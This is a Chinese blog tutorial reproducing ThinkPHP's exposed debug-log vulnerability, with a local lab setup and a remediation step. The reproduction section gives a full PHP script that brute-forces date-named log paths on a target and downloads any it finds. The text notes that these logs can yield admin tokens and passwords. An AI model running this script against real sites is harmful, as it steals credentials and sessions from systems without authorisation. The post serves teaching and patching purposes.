ThinkPHP 日志信息泄露——漏洞复现

一、漏洞简介

1、ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
2、ThinkPHP默认安装后,也会在Runtime目录下生成日志

THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log
日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log

ThinkPHP 日志信息泄露——漏洞复现_第1张图片

注意:
日志信息非常详细,所以影响应该很大。

例如:
1、通过查看日志内容可以发现管理员的登录请求,访问该请求后,可以在不输入用户名密码的前提下直接获取该账户的token信息,并且成功登录该网站
ThinkPHP 日志信息泄露——漏洞复现_第2张图片
2、查看日志获取管理员的密码
ThinkPHP 日志信息泄露——漏洞复现_第3张图片

二、环境搭建

下载thinkphp3.2.3版本的源码,下载地址:http://www.thinkphp.cn/download/610.html
下载后,使用phpstudy搭建
ThinkPHP 日志信息泄露——漏洞复现_第4张图片

三、漏洞复现

通过漏洞简介,我们知道了漏洞的原理,就是日志的存储结构为:项目名\Runtime\Logs\Home\年份_月份_日期.log,但是一个一个手工测试,太麻烦了,可以使用脚本进行测试,php脚本代码如下所示:


$url = "http://127.0.0.1/thinkphp_3.2.3/"; //目标网站
$log = "/Application/Runtime/Logs/Home/"; //其中Application可能会变,比如App,需要自己测试
$stime = "20"; //开始时间,2017年写17
$etime = "21"; //结束时间,2018年写18

$url = $url . $log;
for ($i = $stime; $i <= $etime; $i++) {
	//1月到12月
	for ($j = 1; $j <= 12; $j++) {
		//1号到31号
		for ($d = 1; $d <= 31; $d++) {
			//tp3 Log格式:18_01_30.log
			$log = str_pad($i, 2, "0", STR_PAD_LEFT) . "_" . str_pad($j, 2, "0", STR_PAD_LEFT) . "_" . str_pad($d, 2, "0", STR_PAD_LEFT) . ".log";
			if (check_remote_file_exists($url . $log)) {
				file_put_contents($log, file_get_contents($url . $log));
				echo "Found out:$log\n";
			} else {
				echo "$log isn't exists\n";
			}
		}
	}
}

function check_remote_file_exists($url) {
	$curl = curl_init($url);
	curl_setopt($curl, CURLOPT_NOBODY, true);
	$result = curl_exec($curl);
	$found = false;
	if ($result !== false) {
		$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
		if ($statusCode == 200) {
			$found = true;
		}
	}
	curl_close($curl);
	return $found;
}

运行过程:

需要将tp3.php与php.exe放在同一目录下才行
ThinkPHP 日志信息泄露——漏洞复现_第5张图片
运行命令如下图所示
ThinkPHP 日志信息泄露——漏洞复现_第6张图片
如果存在日志信息泄露的话,会有相关提示信息,如下图所示
ThinkPHP 日志信息泄露——漏洞复现_第7张图片
截至目前为止,thinkphp3与thinkphp5都存在日志信息泄露漏洞,因资料收集过程复杂,thinkphp5的代码放在了知识星球与我的资源中,不列出来了。

四、实战记录可参考以下案例

从外网Thinkphp3日志到杀入内网域控-红队攻击之域内靶机渗透实战演练
https://cloud.tencent.com/developer/article/1752185

https://blog.csdn.net/Fly_hps/article/details/81201904

五、漏洞修复

删除Runtime/Logs下的所有文件,并将APP_DEBUG设置为false

更多资源:

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
ThinkPHP 日志信息泄露——漏洞复现_第8张图片

你可能感兴趣的:(漏洞复现)